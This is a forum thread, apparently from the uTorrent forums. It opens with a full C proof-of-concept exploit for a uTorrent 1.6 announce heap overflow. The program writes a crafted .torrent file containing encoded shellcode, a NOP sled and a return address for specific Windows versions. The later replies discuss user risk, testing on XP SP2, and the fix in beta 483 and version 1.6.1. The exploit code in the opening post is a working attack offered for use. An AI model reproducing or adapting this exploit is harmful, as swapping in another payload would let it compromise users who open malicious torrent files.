Utorrent 1.6 Remote Announce Heap Overflow Exploit POC

[FLX]

/*
* This is a PoC remote exploit for uTorrent 1.6
*
* Author:
* defsec <defacedsecurity@hotmail.com>
* http://www.defacedsecurity.com
*
*
* Works on XP SP1 and  w2k sp1-4
*
*/

#include <stdio.h>
#include <stdlib.h>

#define NASIZE 4880

unsigned char nice_announce[NASIZE];
unsigned char xorops[]="\x33\xc0\x33\xdb";

// win32_exec - EXITFUNC=process CMD=calc Size=343 Encoder=PexAlphaNum
// Restricted Character 0x00
unsigned char shellcode[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47"
"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x34\x4a\x51\x4b\x48"
"\x4f\x55\x42\x42\x41\x30\x4b\x4e\x49\x44\x4b\x58\x46\x43\x4b\x58"
"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x50\x45\x37\x45\x4e\x4b\x38"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x36\x4b\x58\x4e\x30\x4b\x54"
"\x4b\x38\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x4b\x48\x4e\x41\x4b\x48"
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x42\x46\x50\x43\x4c\x41\x53"
"\x42\x4c\x46\x36\x4b\x58\x42\x54\x42\x53\x45\x48\x42\x4c\x4a\x37"
"\x4e\x30\x4b\x48\x42\x34\x4e\x50\x4b\x58\x42\x57\x4e\x51\x4d\x4a"
"\x4b\x48\x4a\x46\x4a\x50\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x35\x41\x53"
"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x37"
"\x42\x35\x4a\x36\x50\x47\x4a\x4d\x44\x4e\x43\x47\x4a\x36\x4a\x49"
"\x50\x4f\x4c\x48\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
"\x4e\x46\x43\x46\x42\x30\x5a";

//msvcrt.dll pop,pop,ret addr all xp sp1 exchange it with 0x7801D07B for win2k sp3/sp4
unsigned char jmptosc[] = "\xeb\x04\
\xa7\x2c\xc2\x77\
\x33\xc0\xb0\x11\xc1\xe0\x08\x5b\x5b\x5b\x2b\xd8\xff\xe3";

int main(int argc,char *argv[])
{
    FILE * pFile;
    long lSize;
    char * buffer;
    size_t result;

    long i = 0;
    long j = 0;
    long lPtrIndex;
    long lHeadSize;
    long lTailSize;
    char * curptr;
    char * alptr;
    char * torrentTail;

    if (argc < 2)
    {
        printf("\n[uTorrent 1.6] Heap Overflow Exploit - by [DEFACEDSECURITY]");
        printf("\n\nUsage: ");
        printf("%s",argv[0]);
        printf(" <TorrentFile>\n");
        return 0;
    }

    pFile = fopen (argv[1],"rb");
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }

    // obtain file size:
    fseek (pFile ,0,SEEK_END);
    lSize = ftell (pFile);
    rewind (pFile);

    // allocate memory to contain the whole file:
    buffer = (char*) malloc (sizeof(char)*lSize);
    if (buffer == NULL)
    {
        fputs ("Memory error",stderr);
        return 0;
    }

    // copy the file into the buffer:
    result = fread (buffer,1,lSize,pFile);
    if (result != lSize)
    {
        fputs ("Reading error",stderr);
        return 0;
    }

    fclose (pFile);

    /* find announce / announce-list and erase it */
    alptr = (char *) strstr(buffer,"announce");
    if (alptr == NULL)
    {
        printf("\ninvalid torrent file");
        return 0;
    }

    curptr = (char *) strstr(alptr, "7:comment");
    lHeadSize = curptr - buffer;
    lTailSize = lSize - lHeadSize;

    torrentTail = (char *) malloc (sizeof(char)*lTailSize);
    memcpy(torrentTail,curptr,lTailSize);

    /* generate offending header */
    strcpy(nice_announce,"d8:announce4864:");
    for (lPtrIndex = 16; lPtrIndex <= 4864+16; lPtrIndex++)
        nice_announce[lPtrIndex] = 0x90;
    lPtrIndex = 84;
    memcpy(nice_announce + lPtrIndex ,xorops,sizeof(xorops)-1);
    lPtrIndex += sizeof(xorops) -1;
    memcpy(nice_announce+lPtrIndex,shellcode, sizeof(shellcode)-1);
    for (lPtrIndex = 4438; lPtrIndex<4458; lPtrIndex++,i++)
        nice_announce[lPtrIndex] = jmptosc[i];

    /* get head and tail together into a file */
    curptr = (char *) malloc(sizeof(char)*(NASIZE+lTailSize));
    for (i=0;i<NASIZE;i++)
        curptr[i] = nice_announce[i];
    for (;i<(NASIZE+lTailSize);i++,j++)
        curptr[i] = torrentTail[j];

    /* write to file and exit */
    pFile = fopen ( "output.torrent" , "wb" );
    if (pFile==NULL)
    {
        fputs ("File error",stderr);
        return 0;
    }
    fwrite(curptr, sizeof(char), (NASIZE+lTailSize), pFile);
    fclose (pFile);

    return 1337; //:)
}

Just a heads up.

[Ultima]

Yah, previously reported on the IRC channel ;\

Just for clarification, it's an exploit that makes use of specifically-engineered .torrent files with corrupt dictionaries, and is not a remote security issue. What does it mean for users? Until a fix is implemented, be careful where you get your .torrent files from -- that's all. Do realize that if you're not sure you can trust all of your RSS feeds, disable them for the time being (so to prevent µTorrent from autoloading malicious .torrent files).

[Firon]

Does it allow for arbitrary code execution? Does this one work on XP SP2?

[Ultima]

"Koepi" (who first informed us on the channel) tested it on SP2, and supposedly, it did work. ^^inf^^ also confirmed it to be working. Not sure about arbitrary code execution though.

[Greg Hazel]

This is an easy fix. Thanks for the report.

[FLX]

I already saw a arbitrary code execution and a local privilege escalation poc where im from. But this is the only one that has been made public. Said to be working on win2000, xp sp1 and xp sp2.

[alex14san]

is it fixed already in last beta (483)?

[Firon]

Yes, ludde fixed it months ago in 483.

http://download.utorrent.com/beta/utorrent-1.6.1-beta-build-483.exe for those who don't have the link.

[Falcon4]

It begs the question, why has the beta version not been added to the download page yet? It's been the most recent, and fully stable, version for at least the past what, 3 months?

edit: Added to the download page as a beta, that is, since obviously it is a "beta"... betas USED to be added to the download page!

[Ultima]

Latest Version: µTorrent 1.6.1 Stable build 488

Download: http://download.utorrent.com/1.6.1/utorrent.exe

Changelog: http://download.utorrent.com/1.6.1/utorrent-1.6.1.txt

[Falcon4]

I understand that.

This. There used to be a beta download there. It's a bitch to scour the forums for that one topic with the download link in it when I want to grab the beta... v.v

[Ultima]

Oh my post wasn't actually a response so much as it was an update I'm not sure why it's not on the front page yet, but I guess they're waiting to update the automatic update server. Or something.

[Falcon4]

I see... sorry

But yeah... it's bugged me for a long time that the beta was never added to the download page

[Ultima]

Dunno, I kinda prefer that betas are linked to from the forum anyway -- it kinda encourages people to visit the forum and report bugs should any pop up.

[Firon]

Most betas usually were, but b483 was intended to be with the webui only.

[Falcon4]

I wouldn't have even known there was a beta if I hadn't already been active in the forums... I think of the forums as the place to, as you said, report bugs... but the main site as the place to get official betas and releases... =\

Perhaps if they would link people - from the download page - to the forum topic about the beta... that would work well too. *shrug*

Hey, if the new 1.6.1 is coming out soon, all the better! I think it may have fixed my UPnP problem too, I dunno =)

[Firon]

1.6.1 already came out it'll be on the main page later

[Ultima]

I... did... sorta... post... a link... up above

[Falcon4]

Wull yeah but.

[xerces8]

1.6.1 is still not on the download page : http://www.utorrent.com/download.php

There is also not a single word about the exploit on the front page.

[Game90]

Firon said "Later" .

...

[µtorrent-Guest]

Thank the new guy in charge for that delay!

Bram Cohen

BitTorrent™ Inc.

Edit: I talk about the downloadpage since yesterday!

[rseiler]

What piece of the story are we missing that "months" went by before the version of the program that the vast majority of the people know about and use (as opposed to a silent beta that was supposed to be only for the webui interface) was actually updated?

Was the exploit not public until this week? Was it maybe unconfirmed until this week that SP2 was vulnerable, thereby reducing the urgency to release the fix?

[Firon]

beta 483 wasn't vulnerable to the issue and it was released last year. Ludde actually unintentionally fixed it when some stuff was rewritten, so it just wasn't known that there was an exploit in the first place.